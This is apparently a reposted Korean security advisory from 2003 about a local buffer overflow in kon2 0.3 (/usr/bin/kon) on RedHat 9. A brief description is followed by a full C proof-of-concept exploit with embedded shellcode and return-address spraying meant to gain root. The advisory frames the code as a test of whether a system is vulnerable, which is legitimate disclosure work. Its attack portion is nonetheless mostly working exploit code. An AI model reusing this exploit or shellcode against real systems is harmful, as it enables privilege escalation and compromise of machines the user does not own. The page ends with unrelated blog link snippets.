발표날짜 : 2003.06.23
해당 시스템 : kon2 0.3
공격유형 : 로컬
위험도 : 상
문제점 :
kon2 소스와 -Console arg 에서 심각한 버그가 발견되었으며 다음의 코드를 이용하여 취약성 여부를
테스트해 보시기 바랍니다.
공격법 / 공격용 소스코드 :
/*
* Buffer overflow in
/usr/bin/kon v0.3.9b for RedHat 9.0
*
* http://www.mail-archive.com/bugtraq@securityfocus.com/msg11681.html
*
* The original bug was found by wszx for RedHat 8.0 - Ported to C
*
* Compile: gcc -Wall kon2root kon2root.c
*
*/
#include <stdio.h>
#include <string.h>
#include
<unistd.h>
#define NOP 0x90
#define RET 0xbffffffa
#define
VULN "/usr/bin/kon"
#define MAXBUF 800
static char
w00tI4r3l33t[]="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
"\xff\xff/bin/id";
int main()
{
int i, *egg;
long retaddr;
static char buff[MAXBUF];
static char *sploit[0x02] = {
w00tI4r3l33t, NULL };
fprintf (stdout, "\n\n\n[ PoC code for local
root exploit in %s ]\n", VULN);
fprintf (stdout, "[ Coded by c0ntex
- http://62.31.72.168 ]\n");
fprintf
(stdout, "[ For Linux RedHat v9 x86 - Ret_Addr 0xbffffffa ]\n\n\n\n");
if((retaddr = 0xbffffffa - strlen(w00tI4r3l33t) - strlen(VULN)) !=
0x00) {
egg = (int *)(buff);
}
for(i = 0x00; i
< MAXBUF; i += 0x04)
*(egg)++ = retaddr; *(egg) = NOP;
execle(VULN, VULN, "-Coding", buff, NULL, sploit);
return(0x00);
}
출처: http://www.hackersnews.org
실용적인 디지털 포렌식 기법과 법률 이슈 정리. Linux, UNIX, Python, 임베디드 장치 개발 등의 강좌 수록. Blockchain, FinTech, IoT 등 최신 IT 트렌드와 관련된 취미 자료를 수집하고, 보안 인식 문화 개선을 위한 정보보호 관련 자료와 일상생활 팁들을 소개.
홈페이지 jQuery 라이브러리에서 CVE-2019-11358 취약점 패치 여부 확인 방법
현재 홈페이지에서 사용 중인 jQuery 라이브러리가 CVE-2019-11358 취약점 패치를 적용했는지 확인하는 방법은 다음과 같습니다. 1. jQuery 버전 확인 홈페이지 소스 코드를 확인하여 jQuery 라이브러리 버전을 직접 확인합니다. 웹 ...
-
뉴스출처 : http://news.naver.com/main/read.nhn?mode=LSD&mid=sec&oid=023&aid=0002991158&sid1=001 내 배우자가 바람을 피우는 것이 확실할까. 심증...
-
PHPSCHOOL ( http://www.phpschool.com ) 국내 1위의 PHP 개발자 커뮤니티 사이트이다. PHP Builder ( http://www.phpbuilder.com ) PHP 최고 사이트라고 해도 과언이 아니며, 새로운 P...